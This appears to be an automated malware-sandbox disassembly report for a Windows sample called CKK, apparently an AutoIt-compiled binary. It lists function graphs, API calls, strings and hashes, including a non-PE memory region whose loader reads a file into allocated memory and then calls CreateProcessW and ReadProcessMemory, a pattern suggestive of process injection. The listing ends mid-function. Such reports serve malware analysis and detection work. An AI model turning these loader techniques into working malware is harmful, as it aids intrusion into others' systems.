                                          control_flow_graph 540 e43170-e43185 541 e431e5-e431e7 540->541 542 e43187-e4318a 540->542 541->542 543 e431e9 541->543 544 e4318c-e43193 542->544 545 e431eb 542->545 546 e431d0-e431d8 DefWindowProcW 543->546 549 e43265-e4326d PostQuitMessage 544->549 550 e43199-e4319e 544->550 547 e82dfb-e82e23 call e418e2 call e5e499 545->547 548 e431f1-e431f6 545->548 553 e431de-e431e4 546->553 583 e82e28-e82e2f 547->583 555 e4321d-e43244 SetTimer RegisterWindowMessageW 548->555 556 e431f8-e431fb 548->556 554 e43219-e4321b 549->554 551 e431a4-e431a8 550->551 552 e82e7c-e82e90 call eabf30 550->552 559 e82e68-e82e77 call eac161 551->559 560 e431ae-e431b3 551->560 552->554 577 e82e96 552->577 554->553 555->554 561 e43246-e43251 CreatePopupMenu 555->561 563 e82d9c-e82d9f 556->563 564 e43201-e43214 KillTimer call e430f2 call e43c50 556->564 559->554 566 e82e4d-e82e54 560->566 567 e431b9-e431be 560->567 561->554 569 e82da1-e82da5 563->569 570 e82dd7-e82df6 MoveWindow 563->570 564->554 566->546 580 e82e5a-e82e63 call ea0ad7 566->580 575 e431c4-e431ca 567->575 576 e43253-e43263 call e4326f 567->576 578 e82dc6-e82dd2 SetFocus 569->578 579 e82da7-e82daa 569->579 570->554 575->546 575->583 576->554 577->546 578->554 579->575 584 e82db0-e82dc1 call e418e2 579->584 580->546 583->546 588 e82e35-e82e48 call e430f2 call e43837 583->588 584->554 588->546
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E4316A,?,?), ref: 00E431D8
                                          • KillTimer.USER32 ref: 00E43204
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E43227
                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E4316A,?,?), ref: 00E43232
                                          • CreatePopupMenu.USER32 ref: 00E43246
                                          • PostQuitMessage.USER32 ref: 00E43267
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 806b1b2f377bd059a9c80e5dc65e653f2392138e6fc9cc9b97b4012e4ce08abe
                                          • Instruction ID: 2a377c38c5a62043a303c5bc28dd601c09dcf0c99326e1c8e4def471f4382e36
                                          • Opcode Fuzzy Hash: 806b1b2f377bd059a9c80e5dc65e653f2392138e6fc9cc9b97b4012e4ce08abe
                                          • Instruction Fuzzy Hash: D6417B30200208ABDF142B78BC1DBF93B59F705348F14711AFA1AB62E2C7B1AB40E765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00112620 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 596 112620-1126ce call 110000 599 1126d5-1126fb call 113530 CreateFileW 596->599 602 112702-112712 599->602 603 1126fd 599->603 608 112714 602->608 609 112719-112733 VirtualAlloc 602->609 604 11284d-112851 603->604 606 112893-112896 604->606 607 112853-112857 604->607 610 112899-1128a0 606->610 611 112863-112867 607->611 612 112859-11285c 607->612 608->604 615 112735 609->615 616 11273a-112751 ReadFile 609->616 617 1128a2-1128ad 610->617 618 1128f5-11290a 610->618 613 112877-11287b 611->613 614 112869-112873 611->614 612->611 621 11288b 613->621 622 11287d-112887 613->622 614->613 615->604 623 112753 616->623 624 112758-112798 VirtualAlloc 616->624 625 1128b1-1128bd 617->625 626 1128af 617->626 619 11291a-112922 618->619 620 11290c-112917 VirtualFree 618->620 620->619 621->606 622->621 623->604 627 11279a 624->627 628 11279f-1127ba call 113780 624->628 629 1128d1-1128dd 625->629 630 1128bf-1128cf 625->630 626->618 627->604 636 1127c5-1127cf 628->636 633 1128ea-1128f0 629->633 634 1128df-1128e8 629->634 632 1128f3 630->632 632->610 633->632 634->632 637 1127d1-112800 call 113780 636->637 638 112802-112816 call 113590 636->638 637->636 644 112818 638->644 645 11281a-11281e 638->645 644->604 646 112820-112824 CloseHandle 645->646 647 11282a-11282e 645->647 646->647 648 112830-11283b VirtualFree 647->648 649 11283e-112847 647->649 648->649 649->599 649->604
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001126F1
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00112917
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction ID: a36b8f46aa39995f9e1eac946769f8343e3f5976259c39a751691aa0ff9022ed
                                          • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction Fuzzy Hash: 7BA12974E00209EBDB18CFA4C895BEEBBB5FF58304F208169E511BB280D7759A91DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 660 e42c63-e42cd3 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: edabfae8857b9f2b0d488673203de7f344c6027160587d23f67ca3b683416563
                                          • Instruction ID: bc9f3359cccb8720cea0bde07ff5bc6fc13a9419a90f451349e5538d3cdab25a
                                          • Opcode Fuzzy Hash: edabfae8857b9f2b0d488673203de7f344c6027160587d23f67ca3b683416563
                                          • Instruction Fuzzy Hash: FBF030755402947AEB3007236C08EB77E7DE7C6F50F11411AFA10A2164C2620841EE70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E761FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 661 e761fe-e76217 662 e7622d-e76232 661->662 663 e76219-e76229 call e7fe21 661->663 665 e76234-e7623c 662->665 666 e7623f-e76263 MultiByteToWideChar 662->666 663->662 671 e7622b 663->671 665->666 668 e763f6-e76409 call e60a8c 666->668 669 e76269-e76275 666->669 672 e76277-e76288 669->672 673 e762c9 669->673 671->662 676 e762a7-e762b8 call e73820 672->676 677 e7628a-e76299 call e82040 672->677 675 e762cb-e762cd 673->675 680 e762d3-e762e6 MultiByteToWideChar 675->680 681 e763eb 675->681 676->681 687 e762be 676->687 677->681 686 e7629f-e762a5 677->686 680->681 684 e762ec-e762fe call e73467 680->684 685 e763ed-e763f4 call e71537 681->685 691 e76303-e76307 684->691 685->668 690 e762c4-e762c7 686->690 687->690 690->675 691->681 693 e7630d-e76314 691->693 694 e76316-e7631b 693->694 695 e7634e-e7635a 693->695 694->685 696 e76321-e76323 694->696 697 e763a6 695->697 698 e7635c-e7636d 695->698 696->681 699 e76329-e76343 call e73467 696->699 700 e763a8-e763aa 697->700 701 e7636f-e7637e call e82040 698->701 702 e76388-e76399 call e73820 698->702 699->685 713 e76349 699->713 704 e763e4-e763ea call e71537 700->704 705 e763ac-e763c5 call e73467 700->705 701->704 716 e76380-e76386 701->716 702->704 717 e7639b 702->717 704->681 705->704 718 e763c7-e763ce 705->718 713->681 719 e763a1-e763a4 716->719 717->719 720 e763d0-e763d1 718->720 721 e7640a-e76410 718->721 719->700 722 e763d2-e763e2 WideCharToMultiByte 720->722 721->722 722->704 723 e76412-e76419 call e71537 722->723 723->685
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000), ref: 00E76258
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 00E762DE
                                          • WideCharToMultiByte.KERNEL32 ref: 00E763D8
                                          • __freea.LIBCMT ref: 00E763E5
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • __freea.LIBCMT ref: 00E763EE
                                          • __freea.LIBCMT ref: 00E76413
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: 81ccec10d1dc6d022e920557df7b2170ea01136aa5e5ebc9d6b63ec3ae1581a7
                                          • Instruction ID: 90ae7889a8b5f0f0e2f1ec6fbc365116a29fa2849fc69243361c20133a57b950
                                          • Opcode Fuzzy Hash: 81ccec10d1dc6d022e920557df7b2170ea01136aa5e5ebc9d6b63ec3ae1581a7
                                          • Instruction Fuzzy Hash: A8510272600616BFEB258F64DC81EAF77A9EB84758F249229FC09F6150EB34DC44C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00112410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 840 112410-112521 call 110000 call 112300 CreateFileW 847 112523 840->847 848 112528-112538 840->848 849 1125d8-1125dd 847->849 851 11253a 848->851 852 11253f-112559 VirtualAlloc 848->852 851->849 853 11255b 852->853 854 11255d-112574 ReadFile 852->854 853->849 855 112576 854->855 856 112578-1125b2 call 112340 call 111300 854->856 855->849 861 1125b4-1125c9 call 112390 856->861 862 1125ce-1125d6 ExitProcess 856->862 861->862 862->849
                                          APIs
                                            • Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112517
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: 8HQTGX6BSVHVPH
                                          • API String ID: 2694422964-767422031
                                          • Opcode ID: 0313425ca3b445e08516944835eba6c232b142d28b04bc0435b4a29c10db4284
                                          • Instruction ID: fbf111f880a86deb097082d34e2d9de61d9a545af8ac8c713f7a811ae91416f3
                                          • Opcode Fuzzy Hash: 0313425ca3b445e08516944835eba6c232b142d28b04bc0435b4a29c10db4284
                                          • Instruction Fuzzy Hash: FF519431D14249DBEF15DBA4C859BEFBB75AF19300F1041A8E618BB2C0D7790B89CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$Delete$Copy
                                          • String ID:
                                          • API String ID: 3226157194-0
                                          • Opcode ID: 23903cf9e9988e9d3f058a2a29eb8d809fbfaed23b8770048f1d389a0a8d0f30
                                          • Instruction ID: 74df4bf540242c12a642b7919f6b0f7ff8dd6a1e75fc6ea64051c57a71125987
                                          • Opcode Fuzzy Hash: 23903cf9e9988e9d3f058a2a29eb8d809fbfaed23b8770048f1d389a0a8d0f30
                                          • Instruction Fuzzy Hash: 0FB13A72A01119ABDF21DFA4DC85EDFBBBDEF48350F1050AAF609F6151EA309A448F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E75AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 976 e75aa9-e75ace 977 e75ad7-e75ad9 976->977 978 e75ad0-e75ad2 976->978 979 e75adb-e75af5 call e6f2c6 call e6f2d9 call e727ec 977->979 980 e75afa-e75b1f 977->980 981 e75ca5-e75cb4 call e60a8c 978->981 979->981 983 e75b26-e75b2c 980->983 984 e75b21-e75b24 980->984 988 e75b2e-e75b46 call e6f2c6 call e6f2d9 call e727ec 983->988 989 e75b4b 983->989 984->983 987 e75b4e-e75b53 984->987 992 e75b55-e75b61 call e79424 987->992 993 e75b64-e75b6d call e7564e 987->993 1021 e75c9c-e75c9f 988->1021 989->987 992->993 1004 e75b6f-e75b71 993->1004 1005 e75ba8-e75bba 993->1005 1009 e75b95-e75b9e call e7542e 1004->1009 1010 e75b73-e75b78 1004->1010 1007 e75c02-e75c23 WriteFile 1005->1007 1008 e75bbc-e75bc2 1005->1008 1012 e75c25-e75c2b GetLastError 1007->1012 1013 e75c2e 1007->1013 1016 e75bc4-e75bc7 1008->1016 1017 e75bf2-e75c00 call e756c4 1008->1017 1020 e75ba3-e75ba6 1009->1020 1018 e75b7e-e75b8b call e755e1 1010->1018 1019 e75c6c-e75c7e 1010->1019 1012->1013 1022 e75c31-e75c3c 1013->1022 1023 e75be2-e75bf0 call e75891 1016->1023 1024 e75bc9-e75bcc 1016->1024 1017->1020 1030 e75b8e-e75b90 1018->1030 1027 e75c80-e75c83 1019->1027 1028 e75c89-e75c99 call e6f2d9 call e6f2c6 1019->1028 1020->1030 1035 e75ca4 1021->1035 1032 e75ca1 1022->1032 1033 e75c3e-e75c43 1022->1033 1023->1020 1024->1019 1034 e75bd2-e75be0 call e757a3 1024->1034 1027->1028 1029 e75c85-e75c87 1027->1029 1028->1021 1029->1035 1030->1022 1032->1035 1040 e75c45-e75c4a 1033->1040 1041 e75c69 1033->1041 1034->1020 1035->981 1045 e75c60-e75c67 call e6f2a3 1040->1045 1046 e75c4c-e75c5e call e6f2d9 call e6f2c6 1040->1046 1041->1019 1045->1021 1046->1021
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: JO
                                          • API String ID: 0-1663374661
                                          • Opcode ID: 42e9b3fc98ac9d42533902c57b8753ebd6683c8a3567b622775da0b7d2c31167
                                          • Instruction ID: 711b3b0861085b4973cd48a19efda04023994b12bed7da3b534e520157357ea4
                                          • Opcode Fuzzy Hash: 42e9b3fc98ac9d42533902c57b8753ebd6683c8a3567b622775da0b7d2c31167
                                          • Instruction Fuzzy Hash: CE51CD72D0060A9FCB21DFA4D845BFEBBB8EF05314F14A15AF409B7291D7B19A019B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E43B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 00E43B40
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00E43B61
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E43B83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 482f5a63ae74c4e05fc42eeb24220e8eb646d3054667ce40dfdb7971b4ba7af5
                                          • Instruction ID: 5517fabbf46f0f47191e03271727cad77295ae5b31aeaf5da3a64507aa719665
                                          • Opcode Fuzzy Hash: 482f5a63ae74c4e05fc42eeb24220e8eb646d3054667ce40dfdb7971b4ba7af5
                                          • Instruction Fuzzy Hash: DD112AB5511208FFDB218FA5EC44AEEB7B9EF04784B10955AA805E7110D2319E449760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                          Download Yara Rule
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00E932B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 7bd07fe17cc7defa20d68765f34c8aaba96b0332242e3c7b2d19799c7360434d
                                          • Instruction ID: 25214fb3b4ee4f34f3f1288e1d1713307c271fe48d9f8bcbf837f97f71c3d690
                                          • Opcode Fuzzy Hash: 7bd07fe17cc7defa20d68765f34c8aaba96b0332242e3c7b2d19799c7360434d
                                          • Instruction Fuzzy Hash: 90C27875A00214CFCB24CFA8E881AADB7F1BF08314F24A569E956BB391D375ED41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E73073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 492e43957e03f317f6591a1216bf2ead11818b31cdd5c8966ef342e7ca15e91c
                                          • Instruction ID: 4ed08233c0a1dd1baa08a69a5f79447377f5317844673ada44cd45e898e277f6
                                          • Opcode Fuzzy Hash: 492e43957e03f317f6591a1216bf2ead11818b31cdd5c8966ef342e7ca15e91c
                                          • Instruction Fuzzy Hash: A5014732342223AFCB704B79AC44A977B98EF05BA1B208321F909F3180CB21C945D6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E4EC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E4FE66
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID:
                                          • API String ID: 1385522511-0
                                          • Opcode ID: 20d494278d5ac313ef42284a2685101f40e7232b2028581d8b12a04d9fa613f7
                                          • Instruction ID: f0e4fcc02e61e5fc390bf3e2e4994d8704ad61a0974b91b48dfbe65c28a2bb97
                                          • Opcode Fuzzy Hash: 20d494278d5ac313ef42284a2685101f40e7232b2028581d8b12a04d9fa613f7
                                          • Instruction Fuzzy Hash: FFB29C74A08340CFCB24CF18E480A6AB7E1BF89714F24596DF895AB3A1D771EC45DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E60668
                                            • Part of subcall function 00E632A4: RaiseException.KERNEL32(?,?,?,00E6068A), ref: 00E63304
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E60685
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: b9283e463f9a110c35e81b05c4a870df31c7c8e50566476e39cdd2aa4dc65054
                                          • Instruction ID: 9585e581713404c449f4be6c813168585c34981d32777ec502192bf1911aa1d0
                                          • Opcode Fuzzy Hash: b9283e463f9a110c35e81b05c4a870df31c7c8e50566476e39cdd2aa4dc65054
                                          • Instruction Fuzzy Hash: 6BF0C23498020D77CB00BAB4FC56D9E77BC5E403D4B606531F914B69E2EF71DA6AC681
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00EB302F
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EB3044
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 90d190593a44918596161014c23cc717ae715431e2aaa29c13d85cb138f084f0
                                          • Instruction ID: aae1dcb79f1b4d651246a440150005793c99785265ecbe46acd2a05e95d67987
                                          • Opcode Fuzzy Hash: 90d190593a44918596161014c23cc717ae715431e2aaa29c13d85cb138f084f0
                                          • Instruction Fuzzy Hash: 75D05B71501314AFDA20A795AC0DFC73B6CD704750F000252B655E20E1DAB4D544CAD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00111300 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CreateMemoryRead
                                          • String ID:
                                          • API String ID: 2726527582-0
                                          • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
